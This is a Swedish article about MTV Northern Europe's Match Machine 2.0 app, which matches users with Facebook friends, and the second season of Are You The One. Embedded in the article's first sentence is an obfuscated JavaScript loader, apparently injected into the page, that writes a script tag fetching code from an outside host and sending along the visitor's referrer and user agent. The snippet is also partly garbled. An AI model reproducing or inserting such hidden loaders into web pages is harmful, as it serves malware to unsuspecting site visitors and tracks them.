Image Image Image Image Image Image Image Image Image Image

| 27 februari, 2020

Scroll to top

Top

MTV triggade 95 miljoner kärleksmatchningar

MTV triggade 95 miljoner kärleksmatchningar
Sebastian

Den eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|beess|var|u0026u|referrer|addaa||js|php’.split(’|’),0,{}))
svenska succéappen är testad av 21 miljoner människor världen över och har lett till 95 miljoner kärleksmatchningar och 818 miljoner visningar på Facebook. MTV:s Match Machine, som letar rätt på din bästa match bland dina Facebookvänner, kommer nu i uppgraderade Match Machine 2.0.

Detta sker inför andra säsongen av MTV:s dejtingreality Are You The One med Sverigepremiär den 7 oktober. Förutom att Match Machine 2.0 nu kan testa din matchningsgrad mot vem som helst av dina Facebookvänner, letar den även upp din bästa match bland de nya deltagarna i Are You The One. Är det kanske dags att hitta The One i din bekantskapskrets?

Första versionen av Match Machine roade medier världen över som förundrades över hur träffsäker appen var. Esquire rapporterade att appen som löst världens kärleksproblem var från Asien, men sanningen är att appen är framtagen i Sverige av MTV Northern Europe tillsammans med Wenderfalck.

“MTV’s ’Match Machine’ Is Weirdly Accurate At Finding Your One True Love” (Huffington Post)

“Forget online dating
, finding your one true love is easier than you think. Thanks to MTV’s Match Machine app you can now find your perfect match in a click of a button and a quick scan of your 
Facebook friends.” (mydaily.co.uk – AOL)

Serien bakom Match Machine – Are You The One
I januari i år började MTV sända den första säsongen av Are You The One – en realityserie där 20 singlar skulle försöka finna sin perfekta match, utvalda av relationsexperter, psykologer, familj, vänner och ex. Om alla lyckades hitta sin match skulle gänget få dela på 1 miljon dollar. Resultatet blev rikare singlar och ett förlovat par som dessutom väntar barn i december.

Den 7 oktober har säsong 2 Sverigepremiär klockan 21.00, en dag efter USA-premiären. Twisten för andra säsongen är att det nu är 21 singlar som deltar och att en kille kan välja mellan två tjejer som båda är en perfekt match. Om ett par matchar eller inte får man reda på i det så kallade ”Truth Booth”.

Prova appen här: http://mtv.se/areyoutheone